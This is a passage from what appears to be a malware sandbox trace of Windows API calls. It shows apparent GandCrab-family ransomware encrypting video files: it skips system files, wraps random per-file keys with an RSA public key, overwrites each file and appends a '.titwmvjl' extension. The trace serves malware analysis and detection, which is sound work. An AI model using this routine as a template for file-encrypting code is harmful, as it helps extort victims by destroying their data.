param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf.titwmvjl") returned 91 [0095.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned 82 [0095.352] lstrlenW (lpString=".swf") returned 4 [0095.352] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.352] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0095.352] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0095.352] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned 82 [0095.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned 82 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="desktop.ini") returned 1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="autorun.inf") returned 1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="ntuser.dat") returned -1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="iconcache.db") returned -1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="bootsect.bak") returned 1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="boot.ini") returned 1 [0095.352] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="ntuser.dat.log") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="thumbs.db") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="ntldr") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="NTDETECT.COM") returned -1 [0095.353] lstrcmpiW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="Bootfont.bin") returned 1 [0095.353] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned 82 [0095.353] lstrlenW (lpString=".swf") returned 4 [0095.353] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.353] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0095.353] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.353] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.353] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\fkeyx3zujmv7_vql.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0095.354] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.354] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0095.355] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.355] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.355] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.356] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.356] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.356] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0095.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.356] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.356] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.356] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.357] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.357] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.357] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.357] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0095.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.357] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.357] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.358] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.358] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5033b8) returned 1 [0095.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.358] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.359] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.359] GetLastError () returned 0x0 [0095.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.359] CryptDestroyKey (hKey=0x5033b8) returned 1 [0095.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.359] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.360] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.360] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503238) returned 1 [0095.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.360] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.360] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.361] GetLastError () returned 0x0 [0095.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.361] CryptDestroyKey (hKey=0x503238) returned 1 [0095.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.361] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.361] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x13609, lpOverlapped=0x0) returned 1 [0095.373] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffec9f7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.373] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13609, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x13609, lpOverlapped=0x0) returned 1 [0095.381] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.381] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0095.382] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.387] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.387] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.388] CloseHandle (hObject=0x2bc) returned 1 [0095.388] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\fkeyx3zujmv7_vql.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\fkeyx3zujmv7_vql.swf.titwmvjl"), dwFlags=0x1) returned 1 [0095.389] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.389] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.389] lstrcmpW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2=".") returned 1 [0095.389] lstrcmpW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="..") returned 1 [0095.390] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="Jsd4BSiqfKBc1.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4" [0095.390] lstrlenW (lpString=".titwmvjl") returned 9 [0095.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned 79 [0095.390] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.390] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4.titwmvjl") returned 88 [0095.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned 79 [0095.392] lstrlenW (lpString=".mp4") returned 4 [0095.392] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.392] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.392] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.392] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned 79 [0095.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned 79 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="desktop.ini") returned 1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="autorun.inf") returned 1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="ntuser.dat") returned -1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="iconcache.db") returned 1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="bootsect.bak") returned 1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="boot.ini") returned 1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="ntuser.dat.log") returned -1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="thumbs.db") returned -1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.392] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="ntldr") returned -1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="NTDETECT.COM") returned -1 [0095.393] lstrcmpiW (lpString1="Jsd4BSiqfKBc1.mp4", lpString2="Bootfont.bin") returned 1 [0095.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4") returned 79 [0095.393] lstrlenW (lpString=".mp4") returned 4 [0095.393] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.393] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.393] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.393] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.393] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\jsd4bsiqfkbc1.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0095.394] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.394] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0095.395] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.395] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.396] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.396] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.396] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.396] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0095.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.396] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.396] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.397] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.397] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.397] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.397] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.398] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0095.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.398] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.398] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.398] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.399] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0095.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.399] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.399] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.399] GetLastError () returned 0x0 [0095.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.400] CryptDestroyKey (hKey=0x503778) returned 1 [0095.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.400] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.400] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.400] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0095.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.401] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.401] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.401] GetLastError () returned 0x0 [0095.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.401] CryptDestroyKey (hKey=0x503778) returned 1 [0095.402] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.402] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.402] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xe4a7, lpOverlapped=0x0) returned 1 [0095.416] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff1b59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.416] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe4a7, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xe4a7, lpOverlapped=0x0) returned 1 [0095.420] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.420] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0095.421] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.425] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.425] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.425] CloseHandle (hObject=0x2bc) returned 1 [0095.426] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\jsd4bsiqfkbc1.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\Jsd4BSiqfKBc1.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\jsd4bsiqfkbc1.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.427] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.427] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.427] lstrcmpW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2=".") returned 1 [0095.427] lstrcmpW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="..") returned 1 [0095.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="KyZTn6pjXDziIBU471.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi" [0095.427] lstrlenW (lpString=".titwmvjl") returned 9 [0095.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned 84 [0095.427] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.427] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi.titwmvjl") returned 93 [0095.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned 84 [0095.427] lstrlenW (lpString=".avi") returned 4 [0095.427] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.427] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0095.427] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0095.428] 